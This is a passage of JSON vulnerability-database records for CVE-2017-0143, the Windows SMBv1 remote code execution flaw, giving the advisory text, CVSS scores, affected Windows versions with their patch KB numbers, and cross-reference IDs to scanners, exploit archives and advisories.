["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
